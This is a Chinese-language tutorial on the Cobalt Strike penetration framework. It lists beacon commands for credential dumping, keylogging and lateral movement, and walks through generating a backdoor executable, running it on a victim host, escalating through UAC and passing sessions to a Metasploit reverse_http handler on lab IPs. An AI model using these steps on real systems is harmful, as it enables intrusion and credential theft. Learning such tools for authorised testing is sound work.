您好,登錄后才能下訂單哦!
如何進行內網滲透神器簡單使用,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。
一、介紹內網滲透的神器工具CobaltStrike
Cobalt Strike 一款以Metasploit為基礎的GUI框架式滲透測試工具,集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,exe、powershell木馬生成等。
釣魚攻擊包括:站點克隆,目標信息獲取,java執行,瀏覽器自動攻擊等。
Cobalt Strike 主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共享攻擊資源與目標信息和sessions。
Cobalt Strike 作為一款協同APT工具,針對內網的滲透測試和作為apt的控制終端功能,使其變成眾多APT組織的首選。
文件內容如下:
二、啟動CobaltStrike
1.啟動服務端CobaltStrike
服務端關鍵文件teamserver與cobaktstrike.jar
打開命令界面,切換到文件夾目錄下,輸入sudo ./teamserver <host> <password> [/path/to/c2.profile]
1 - 必填參數host 本服務器外網IP/域名
2 - 必填參數password Client GUI連接時需要輸入的密碼
3 - 可選參數Malleable C2 communication profile 指定C2通信配置文件該功能體現了CS
示例:本機IP:192.168.1.136
2.打開客戶端cobaltstrike.jar,配置按照啟動服務的配置進行。
點擊連接,進入主界面。
三、參數介紹
1.Cobalt Strike
1- 新建鏈接(可以支持多個服務端)
2- 設置(配置控制臺界面)
3- 可視化(展示控制的形式)
4- VPN接口(配置VPN)
5- 監聽器(管理監聽配置)
6- 腳本管理器(管理腳本,用于管理第三方腳本)
2.視圖
1- 應用信息(顯示被攻擊著的機器的應用信息)
2- 憑證信息(通過hashdump或者獼猴桃抓到的密碼都會保存到此處)
3- 文件下載(下載文件)
4- 日志(事件記錄)
5- 鍵盤記錄
6- 代理信息
7- 屏幕截圖(截取被攻擊者的屏幕)
8- 腳本控制臺(腳本的命令執行的界面)
9- 目標(顯示目標主機)
10- web日志
3.攻擊
1- HTML Application (生成惡意的HTA木馬文件)
2- MS Office Macro (生成office宏病毒文件)
3- Payload Generator (生成各種語言版本的payload)
4- Windows Executable (生成可執行Payload)
5- Windows Executable(S)(把包含payload,Stageless生成可執行文件(包含多數功能)
1- web服務管理(對開啟的web服務進行管理)
2- 克隆網站
3- 文件下載(提供web下載文件)
4- Scripted Web Delivery (提供Web服務,便于下載和執行PowerShell Payload,類似于Metasploit的web_delivery)
5- 簽名Applet攻擊(啟動一個Web服務以提供自簽名Java Applet的運行環境)
6- 智能攻擊(自動檢測Java版本并利用已知的exploits繞過security)
7- 信息搜集(獲取系統信息)
4.beacon命令
beacon> help
Beacon Commands
===============
Command Description
------- -----------
argue 進程參數欺騙
blockdlls 阻止子進程加載非Microsoft DLL
browserpivot 注入受害者瀏覽器進程
bypassuac 繞過UAC提升權限
cancel 取消正在進行的下載
cd 切換目錄
checkin 強制讓被控端回連一次
clear 清除beacon內部的任務隊列
connect Connect to a Beacon peer over TCP
covertvpn 部署Covert VPN客戶端
cp 復制文件
dcsync 從DC中提取密碼哈希
desktop 遠程桌面(VNC)
dllinject 反射DLL注入進程
dllload 使用LoadLibrary將DLL加載到進程中
download 下載文件
downloads 列出正在進行的文件下載
drives 列出目標盤符
elevate 使用exp
execute 在目標上執行程序(無輸出)
execute-assembly 在目標上內存中執行本地.NET程序
exit 終止beacon會話
getprivs Enable system privileges on current token
getsystem 嘗試獲取SYSTEM權限
getuid 獲取用戶ID
hashdump 轉儲密碼哈希值
help 幫助
inject 在注入進程生成會話
jobkill 結束一個后臺任務
jobs 列出后臺任務
kerberos_ccache_use 從ccache文件中導入票據應用于此會話
kerberos_ticket_purge 清除當前會話的票據
kerberos_ticket_use Apply 從ticket文件中導入票據應用于此會話
keylogger 鍵盤記錄
kill 結束進程
link Connect to a Beacon peer over a named pipe
logonpasswords 使用mimikatz轉儲憑據和哈希值
ls 列出文件
make_token 創建令牌以傳遞憑據
mimikatz 運行mimikatz
mkdir 創建一個目錄
mode dns 使用DNS A作為通信通道(僅限DNS beacon)
mode dns-txt 使用DNS TXT作為通信通道(僅限D beacon)
mode dns6 使用DNS AAAA作為通信通道(僅限DNS beacon)
mode http 使用HTTP作為通信通道
mv 移動文件
net net命令
note 備注
portscan 進行端口掃描
powerpick 通過Unmanaged PowerShell執行命令
powershell 通過powershell.exe執行命令
powershell-import 導入powershell腳本
ppid Set parent PID for spawned post-ex jobs
ps 顯示進程列表
psexec Use a service to spawn a session on a host
psexec_psh Use PowerShell to spawn a session on a host
psinject 在特定進程中執行PowerShell命令
pth 使用Mimikatz進行傳遞哈希
pwd 當前目錄位置
reg Query the registry
rev2self 恢復原始令牌
rm 刪除文件或文件夾
rportfwd 端口轉發
run 在目標上執行程序(返回輸出)
runas 以其他用戶權限執行程序
runasadmin 在高權限下執行程序
runu Execute a program under another PID
screenshot 屏幕截圖
setenv 設置環境變量
shell 執行cmd命令
shinject 將shellcode注入進程
shspawn 啟動一個進程并將shellcode注入其中
sleep 設置睡眠延遲時間
socks 啟動SOCKS4代理
socks stop 停止SOCKS4
spawn Spawn a session
spawnas Spawn a session as another user
spawnto Set executable to spawn processes into
spawnu Spawn a session under another PID
ssh 使用ssh連接遠程主機
ssh-key 使用密鑰連接遠程主機
steal_token 從進程中竊取令牌
timestomp 將一個文件的時間戳應用到另一個文件
unlink Disconnect from parent Beacon
upload 上傳文件
wdigest 使用mimikatz轉儲明文憑據
winrm 使用WinRM橫向滲透
wmi 使用WMI橫向滲透
四、使用Cobalt strike
1.創建監聽器
注:cs中提供了8種監聽器:
beacon_xx 系列為Cobalt Strike自身,包括 dns、http、https、smb 四種方式的監聽器。
foreign系列為外部監聽器,通常與MSF或者Armitage聯動。
創建好之后會顯示監聽開始
2.生成后門
點擊攻擊----生成后門---Windows Executable
監聽器選擇我們剛才創建的,根據攻擊的系統選擇64位還是32位。
保存生成后門的exe文件。
3.連接
將生成的后門程序,上傳到受害者的機器上,運行,發現主機上線。
在主機右鍵,進入beacon,可以進行下一步命令執行操作。
備注:beacon的命令執行功能較少用起來不方便,可以使用Ladon腳本。
Ladon腳本下載地址:https://github.com/k8gege/Ladon
Ladon具體使用方法:https://github.com/k8gege/Aggressor
4.提權
在上線主機右鍵后,點擊提權,選擇uac提權。
成功后會出現一個新的主機。之后的操作可以在新的主機進行。
五、與MSF聯動
Kali IP:172.16.20.18
受害者機器:172.16.20.20
CS:172.16.20.19
1.在MSF中創建監聽器
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 172.16.20.18
lhost => 172.16.20.18
msf5 exploit(multi/handler) > set lport 3333
lport => 3333
msf5 exploit(multi/handler) > run
注:監聽監聽kali自身地址。
2.在CS中設置新的監聽地址
注意:payload要與msf中的payload要一致。
在控制中右鍵--增加會話,選擇msf的會話。
此時拿到meterpreter。
輸入shell,進入主機命令操作。
看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。